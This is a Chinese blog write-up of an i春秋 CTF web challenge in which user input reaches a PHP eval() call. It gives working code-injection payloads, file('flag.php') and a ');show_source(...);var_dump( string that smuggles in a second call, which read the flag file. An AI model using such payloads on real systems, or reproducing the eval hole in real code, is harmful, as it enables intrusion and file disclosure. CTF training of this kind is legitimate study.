i春秋CTF训练 Misc Web 爆破-2

最新推荐文章于 2024-04-26 20:20:09 发布
最新推荐文章于 2024-04-26 20:20:09 发布
阅读量653 收藏 1
点赞数 1
分类专栏: CTF 文章标签: php
来自 椰奶冻不安全 的博客,复制完可要记得我吖
本文链接:https://blog.csdn.net/qq_40654505/article/details/106879775
版权

Misc Web 爆破-2](https://www.ichunqiu.com/battalion?t=1)

题目内容:flag不在变量中。

链接需到ichunqiu网站申请

访问网页得到php代码

<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);

依旧是通过请求变量hello,再用var_dump()显示,可以考虑文件包含,在url请求flag.php文件

方法一

  • 在PHP中有一个函数file_get_contents():把整个文件读入一个字符串中,该函数是用于把文件的内容读入到一个字符串中的首选方法。构造payload

    http://d7a0003ea7474a0386fbb99fdcf6ce82a31ccae449cc4ab8.changame.ichunqiu.com/?hello=file_get_contents('flag.php')

    string(83) " <?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);

  • 貌似是file_get_contents()这个函数不行,找到另一个file,与file_get_contents()类似,不同的是file()将文件作为一个数组返回。数组中的每个单元都是文件中相应的一行,包括换行符在内。

    http://d7a0003ea7474a0386fbb99fdcf6ce82a31ccae449cc4ab8.changame.ichunqiu.com/?hello=file('flag.php')

    array(3) { [0]=> string(6) " string(32) "$flag = 'Too Young Too Simple'; " [2]=> string(45) "#flag{****************************}; " } <?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
方法二

可以用);闭包,然后执行其他命令,如show_source和它的别名highlight_file

http://d7a0003ea7474a0386fbb99fdcf6ce82a31ccae449cc4ab8.changame.ichunqiu.com/?hello=);show_source('flag.php');var_dump(

<?php
$flag = 'Too Young Too Simple';
#flag{******************};
<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);

原理就是将hello=之后的所有值赋值给$a,然后输入var_dump()内,最后执行为

var_dump();show_source('flag.php');var_dump();
椰奶冻不安全
关注
专栏目录
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF爆破专题】
qq_74240553的博客
01-17 1109
CTF爆破
CTF题目合集
cgygsw的博客
01-26 3663
在给定的代码中,call_user_func_array(array($this, $this->method), $this->args) 的作用是调用对象 $this 的方法 $this->method(也就是调用ping函数的方法 也就是destruct下面那个ping函数),并将 $this->args 数组作为参数传递给该方法。反序列化之后就会调用wakeup这个函数 : 这个函数的内容 是对参数的内容进行了循环遍历 执行WAF函数的内容。
[CTF]No.0001 博兹瓦纳-爆破
林毅洋
07-24 642
每日一题CTF博兹瓦纳-爆破?其实有更好的办法来源:HBCTF第一场WP 类别:zip伪加密、CRC校验 来源:http://www.moonsos.com/post/256.html 用到工具:HxD(16进制编辑器) 或 winhex      WINRAR 或 好压 (查看 CRC32)文件下载地址:http://hbctf-1252906577.costj.myqcloud.com
CTF练习】Ctfshow入门 爆破(21-24)
Lush_hair_Dl的博客
03-10 1930
爆破题常用的工具就是bp的Intruder模块,将抓到的包发送到Repeater(点击action会有相应选项),用字典爆破:本题是一个登录窗口,首先第一步就是先输入用户名为:admin(一般没有额外提示就这么猜),密码随便输(此处输入111),然后登录。这一过程的目的是为了抓包查看爆破点有的时候抓包会直接看到用户名和密码的位置,这里就不能直接看到,此处将用户名和密码进行base64加密(对于一串字符后有=,基本就要猜测这一串数据是否是base64加密,解密看看是否有什么信息),解密后发现是。
ctf-show爆破模块练习
m0_74097148的博客
04-11 726
之后执行如上命令,下面会自动回推可能种子,找到该题目对应的PHP版本,可以F12,在网络中查看到对应版本(我这里是7.3.11)
i春秋 CTF大本营 竞赛训练营 200+道题目答案
03-30
i春秋 CTF大本营 竞赛训练营 200+道题目答案 竞赛包括冬令营白帽黑客专项训练赛之春秋杯等 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际...
ctf-all-in-one
01-30
ctf-all-in-one
CTF-MISC关于各类编码习题(湖工商扛把子)
03-17
在“CTF-MISC关于各类编码习题(湖工商扛把子)”这个主题中,你可以通过实践和解决1-1等文件中的题目,进一步提升自己在编码解码方面的技能。了解和熟练掌握这些编码方式对于CTF比赛中的Misc任务至关重要,能够帮助...
ctfweb攻防工具-御剑1.5.7z
04-06
【御剑】是一款知名的Web安全扫描工具,常用于CTF(Capture The Flag)竞赛和网络安全检测。CTF是一种信息安全竞赛,参与者通过展示攻击与防御技术来争夺“旗标”,即获取或保护特定的信息资源。在这样的竞赛中,Web...
ctfshow 爆破 刷题记录
qq_63548648的博客
12-11 365
1
CTF日记之web题目(入门题目)
sunleibaba的博客
01-22 1000
CTF日记 今天的题目是i春秋ctf中的:“百度杯”CTF比赛 2017 二月场 web 爆破-1 点击创建好的连接,发现网页: 简单的代码审计: 加载flag.php文件,获取hello参数,如果hello的参数中不能匹配到该正则表达式,,就会报错。该正则表达式的双//是分隔符,没什么具体的意义;^和$ 是开头和结尾的意思;\w表示的是a-z,A-Z和0-9,再加上_下划线符号,,也就是说除了这四类符号之外的符号出现,就会报错,可是我们发现flag.php中有.,所以,肯定不能将flag.php作为
百度杯”CTF比赛 2017 二月场,Web爆破-2
Pai_Space
07-03 115
百度杯”CTF比赛 2017 二月场,Web爆破-2
CTF解题基本思路步骤(miscweb
热门推荐
Love&Share
10-22 2万+
平时注意收集做题用到的工具和脚本 知识点总结 步骤使用序号列表,并列使用项目列表 找不到思路,或者是出现异常,就回去仔细读题 文章目录CTF-web基础解题步骤CTF-misc解题思路图片:主要步骤:JPG:特征LsbIDAT隐写修改高度PNG:特征修改高度XORGIF:特征其他:- bgp:音频:视频:逐帧分割其他压缩包:流量:其他:pyc文件相关DTMFpcap文件修复乐符解密linux光盘文件(ext3)pdfpcap文件修复乐符解密linux光盘文件(ext3)pdf 提示:这里对文章进行总结: 例
杂项题(MISC)和web安全题【1】
m0_74136301的博客
10-20 1267
web安全从门槛面前踱步系列。
部分题解(miscweb
最新发布
2201_75381296的博客
04-26 323
发现有密码,010编辑器看一下,压缩源文件数据区和目录去的全方位标记都不为00 00,并不是伪加密,所以就要及逆行暴力破解。因为在PHP中==会先进行类型转化在比较,如字符串与数字比较,会取字符串开头的数字与数字比较,开头无数字则取结果为0。先用010打开,然后看到开头是pk,并且开头为50 4B是压缩文件,把文件改为压缩文件。用bp修改为post请求,用what=flag,然后发送请求,就可以得到flag。在线工具解密BrainFuck编码,就可以得到flag。破解开密码,打开就可以得到flag。
攻防世界 新手练习区 MISC+WEB
七月_的博客
06-21 2137
题目描述:菜猫给了菜狗一张图,说图下面什么都没有
真的很简单 i春秋
WEB渗透测试 从入门到萌新
04-12 1086
题目描述 在环境里面 浏览器 访问http://file.ichunqiu.com/49ba59ab下载dedeCMS。 下载工具进行爆破 第一个是账号 、第二个是md5加密MD5免费在线解密破解_MD5在线加密-SOMD5 接下来是找后门目录。查找后台地址,手动输了几个常见的,结果不行;用御剑扫了一下,结果也扫不出来 我们进行百度搜索cms相关后台 dedeCMS漏洞:mysqli_error_trace.inc 文件里会残留后台路径。 dedeCMS目录中的data...
20220129--CTF刷题--- WEB方向--简单题--含常见的 HTTP请求头知识点总结
qq_51550750的博客
01-29 5324
20220129–CTF刷题— WEB方向–简单题–常见的 HTTP请求头–含总结 刷题网站:攻防世界 https://adworld.xctf.org.cn/ 关于更多的刷题平台汇总:这是我自己的汇总(也包含自己可以在本地搭建的 网站) https://blog.csdn.net/qq_51550750/article/details/122748075 于是开启代理,开始burp抓包: 添加上X-Forwarded-For的头: 得到相应: 根据提示再加上referer的头: 最终得到flag
河南省CTF训练营-web文件上传实战指导
资源摘要信息:"河南省网络安全高校战队联盟CTF训练营-web文件上传第一期" 该训练营主题聚焦于网络安全领域中的一个常见而又重要的议题——Web文件上传漏洞。在这个领域内,CTF(Capture The Flag)比赛是一种流行的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值